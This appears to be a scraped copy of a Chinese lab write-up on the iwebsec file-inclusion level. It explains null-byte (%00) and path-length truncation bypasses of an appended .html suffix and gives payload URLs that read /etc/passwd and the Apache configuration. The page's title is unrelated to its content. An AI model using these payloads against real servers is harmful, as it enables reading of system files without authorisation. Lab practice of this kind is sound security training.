沈阳建站程序建设厅网站的无法打印

当前位置： 首页 > news >正文

沈阳建站程序,建设厅网站的无法打印,移动建站优化,sharepoint网页制作教程目录 前言 1.%00截断 2.文件字符长度截断法#xff08;又名超长文件截断) 方法1#xff08;路径截断法#xff09; 方法2#xff08;点号截断法#xff09; 第02关 文件包含绕过 1.打开靶场 2.源码分析 3.00文件截断原理 4.00截断的条件 5.文件包含00截断绕过 …目录 前言 1.%00截断 2.文件字符长度截断法又名超长文件截断) 方法1路径截断法 方法2点号截断法 第02关 文件包含绕过 1.打开靶场 2.源码分析 3.00文件截断原理 4.00截断的条件 5.文件包含00截断绕过 1访问test.txt 2访问敏感文件 6.文件字符长度截断法(垃圾字符为./) 前言 文件包含漏洞中在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件无论这个文件是不是PHP为其后缀都可以当成PHP执行。 文件上传的截断绕过通常源码包含如下字段比如说传入的参数filenamephpinfo.txt那么include时会为文件名加上 .html后缀于是include的文件名就变为了phpinfo.txt.html这样会导致文件包含漏洞利用出现失败。于是如何进行漏洞渗透使得此时渗透过程中即便传入的参数为phpinfo.txt但是包含的文件仍为phpinfo.txt这个后缀.html加不到后面就可以绕过这个文件包含的过滤了。 \(filename \)_GET[filename];include(\(filename . .html); 通常来讲文件包含的绕过方法为%00截断以及字符长度截断法。 1.%00截断 前提是php5.3.4且  magic_quotes_gpcoff原理是%00是被会url解码成0x00,如果遇到0x00就会认为读取已结束所以导致截断。 2.文件字符长度截断法又名超长文件截断) 方法1路径截断法 1前提是php版本5.2.8 2Windows下目录最大长度为256字节超出的部分会被丢弃 3Linux下目录最大长度为4096字节超出的部分会被丢弃。 方法2点号截断法 1仅适用windows系统 2当长度大于256B时才会造成扩展名截断 由于本关卡中iwebsec是搭建在docker中使用linux系统故而只能使用路径截断法 第02关 文件包含绕过 1.打开靶场 iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/fi/02.php 2.源码分析 如下所示源码包含include函数具备文件包含漏洞 ?phprequire_once(../header.php);? htmlheadtitle本地文件包含绕过/title/headh2本地文件包含绕过/h2div classalert alert-successp/02.php?filenametest.txt%00 /p/divbody ?phpif(isset(\)_GET[filename])){\(filename \)_GET[filename];include(\(filename . .html);}else{exit();}?不过文件包含的过程中对filename的处理源码如下所示是将文件名后加上.html的后缀也就是如果filenametest那么include的文件未test.html \)filename \(_GET[filename];include(\)filename . .html); 也就是说无论传入任意后缀的文件尾部都会被加上.html后缀那么考虑用%00截断方法这样可以将后面的.html截断include函数传入的参数仍为原始文件名 3.00文件截断原理 00/x00截断原理0x00是十六进制表示方法是ascii码为0的字符在有些函数处理时会把这个字符当做结束符。系统在对文件名的读取时如果遇到0x00就会认为读取已结束。这个可以用在对文件类型名的绕过上。 服务器在解析过程中遇到ascii码为零的位置就停止而这个ascii码为零的位置在16进制中是00用0x开头表示16进制也就是所说的0x00截断。 这样的话如果我们要包含的文件名字为test.txt,在服务器拼接上.html后再被include文件名变为了test.txt.html这样就没有办法进行渗透 test.txt.html 假设此时我们要包含的文件名为test.txt%00,这时候在在服务器拼接上.html后再被include文件名变为了test.txt%00.html test.txt%00.html 由于%00截断的原理服务器在将%00解码后发生了截断功效于是文件名便为 test.txt 这样就实现了文件包含%00绕过截断 4.00截断的条件 第一点PHP的版本要小于5.3.4
第二点php中的设置文件php.ini中的 magic_quotes_gpc 要关闭, 若想修改magic_quotes_gpc,需要修改php.ini文件将magic_quotes_gpc关闭掉 5.文件包含00截断绕过 1访问test.txt iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/fi/02.php?filenametest.txt%00 2访问敏感文件 访问/etc/passwd 如下所示渗透成功 iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/fi/02.php?filename/etc/passwd%00 访问Apache的httpd配置文件如下所示渗透成功 iwebsec 靶场漏洞库iwebsechttp://iwebsec.com:81/fi/02.php?filename/etc/httpd/conf/httpd.conf%00 6.文件字符长度截断法(垃圾字符为./) 在这里构造垃圾字符时有一个小技巧使用word文档构造./././一直累加直到字符数超过4096即可 构造如下url垃圾字符的长度在linux系统中要超过4096 http://iwebsec.com:81/fi/02.php?filenametest.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 如下所示渗透成功